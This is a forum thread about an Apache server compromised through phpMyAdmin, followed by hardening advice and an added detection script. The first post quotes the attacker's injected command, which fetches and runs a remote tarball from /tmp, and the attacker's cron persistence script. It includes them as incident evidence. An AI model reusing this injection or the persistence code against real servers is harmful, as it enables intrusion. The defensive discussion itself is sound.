# Hacked via Apache, how to prevent

## marxin

Hello everyone,

My apache got hacked via phpmyadmin. I found that a command had been launched, with the following code from the apache access_log:

```
88.191.14.38 - - [07/Nov/2009:00:08:55 +0100] "GET /phpmyadmin/config/config.inc.php?p=phpinfo();c=cd%20/tmp;wget%20http://212.144.252.5/bh.tgz;tar%20xvf%20bh.tgz;rm%20-fr%20bh.tgz;cd%20.pid;./init;./fuck HTTP/1.1" 200 180
88.191.14.38 - - [07/Nov/2009:00:08:55 +0100] "GET /?c=cd%20/tmp;wget%20http://212.144.252.5/bh.tgz;tar%20xvf%20bh.tgz;rm%20-fr%20bh.tgz;cd%20.pid;./init;./fuck HTTP/1.1" 200 44132
```

ls of my phpmyadmin directory:

```
ls -l /var/www/localhost/htdocs/phpmyadmin/ | grep config
drwxr-xrwx  4 apache apache    224 Nov 15 22:32 config
```

all files for the hack were downloaded to this directory, and here is the ls:

```
marxin_server .pid # ls
1  b2        cron.d  f   fuck  h    init  j2           mech.pid      mech.set  r  sl   stream  v   x
b  bang.txt  dir     f4  fwd   h.c  j     mech.levels  mech.session  plm.seen  s  std  tty     v2  y2kupdate
```

code of the script which was executed at the start of the hack:

```
#!/bin/sh
pwd > dir
dir=$(cat dir)
echo "* * * * * $dir/y2kupdate >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep y2kupdate
echo "#!/bin/sh
if test -r $dir/mech.pid; then
pid=\$(cat $dir/mech.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir
./r &>/dev/null" > y2kupdate
chmod u+x y2kupdate
```

Thank you for your advice, and I hope you will help me fix this hole in my server.

marxin

----------

## cach0rr0

So, my first thoughts:

- I personally despise mod_security, and also despise the idea of running regex against web requests in general, never mind doing so as a component of Apache itself; nonetheless, updated mod_security rules will protect against most of these hacks.

- This is an ancient hack, and has likely been fixed in more recent revisions of phpmyadmin.

- If you can, I would protect phpmyadmin with .htaccess/.htpasswd. Meaning, require form-based auth before anyone can even get TO a position where they can attack phpmyadmin. For example, putting this in .htaccess:

```
AuthUserFile /var/www/passwords
AuthName "Restricted Access"
AuthType Basic
require valid-user
```

then creating that file via

```
htpasswd -c /var/www/passwords someusername
<enter your password twice when prompted>
```

To add subsequent users, omit the -c switch:

```
htpasswd /var/www/passwords anotherusername
```

In short, password-protect the phpmyadmin directory.

Just in general, this should be done; do not give attackers a chance to attack your application directly. Make them brute-force an Apache password if they want to even have a CHANCE to attack an application.

I do this with everything that isn't a standard html page. I *ESPECIALLY* do this with very common webapps, such as phpmyadmin, Horde, etc.

Now, with regards to tidying up your server, I would highly recommend, if you have physical access, booting from a thumb drive or CD/DVD and running rkhunter, chkrootkit, and even clamscan (ClamAV). Personally, after even the slightest hack I stop trusting my server, back things up, blow the server away and rebuild - but I'm paranoid in that respect.

Hope that helps.

----------

## aidanjt

Why is your phpmyadmin dir even apache-writable in the first place?

```
chown -R root:apache * && find -type d -exec chmod 750 {} \; && find -type f -exec chmod 640 {} \;
```

That will close off that nasty little hole.

----------

## Hu

Why was /tmp mounted -o exec on a system with PHP installed?

Whoever wrote that hack should be smacked.  That is a terrible shell script!  First, there is no need to write the current directory to a temporary file just to load it into a variable.  Second, crontab can be given data on stdin, so no need for the temporary cron.d, either.  Third, the if test to see if anything was killed is wrong.  Since all output is redirected to null, it is guaranteed to produce no output.  The attacker should have tested the return code of the kill, not the amount of output it generated.  Finally, since the attacker apparently wanted all output discarded, he should have just redirected output at the top of the script, rather than doing it for every child.

----------
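As an added post-incident checklist that ties together the three points raised in the replies (the chained commands visible in the access_log, the apache-owned and world-writable phpmyadmin directory, and /tmp mounted with exec allowed); this is example code written for this page, not anything the posters provided, and the function names, the regex and the paths in the usage comments are assumptions:

```shell
#!/bin/sh
# Added post-incident checks for the three issues raised in this thread
# (example code, not from the original posters). Function names and the
# regex are the editor's own; adjust the web root, user and log paths.

# 1. Flag access_log requests that chain shell commands in the query string:
#    a ';', '|' or backtick (literal or percent-encoded) followed later in the
#    same request by a download/exec verb, as in the two lines marxin posted.
#    Exit status is grep's: 0 if at least one request matched.
scan_access_log() {
    grep -E '"(GET|POST) [^"]*(;|%3[Bb]|[|]|%7[Cc]|`|%60)[^"]*(wget|curl|tftp|chmod|\./)' "$1"
}

# 2. List paths under a web root that the web server user owns or that are
#    world-writable; either lets a compromised PHP process plant files there
#    (aidanjt's point: phpmyadmin/config was owned by apache and o+w).
find_webserver_writable() {
    root=$1
    user=$2
    find "$root" \( -user "$user" -o -perm -o+w \) -print
}

# 3. Check whether /tmp is mounted noexec by parsing a mounts table
#    (/proc/mounts by default; a file path can be passed for testing).
#    Hu's point: with exec allowed, the fetched binaries ran from /tmp.
tmp_has_noexec() {
    mounts=${1:-/proc/mounts}
    awk '$2 == "/tmp" && $4 ~ /(^|,)noexec(,|$)/ { found = 1 }
         END { exit !found }' "$mounts"
}

# Usage from the shell (paths are examples, not taken from the thread):
#   scan_access_log /var/log/apache2/access_log
#   find_webserver_writable /var/www/localhost/htdocs apache
#   tmp_has_noexec && echo "/tmp is noexec" || echo "/tmp allows exec"
```

The first check is a coarse signature for the request shape seen here, not a replacement for mod_security rules; review its hits by hand.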

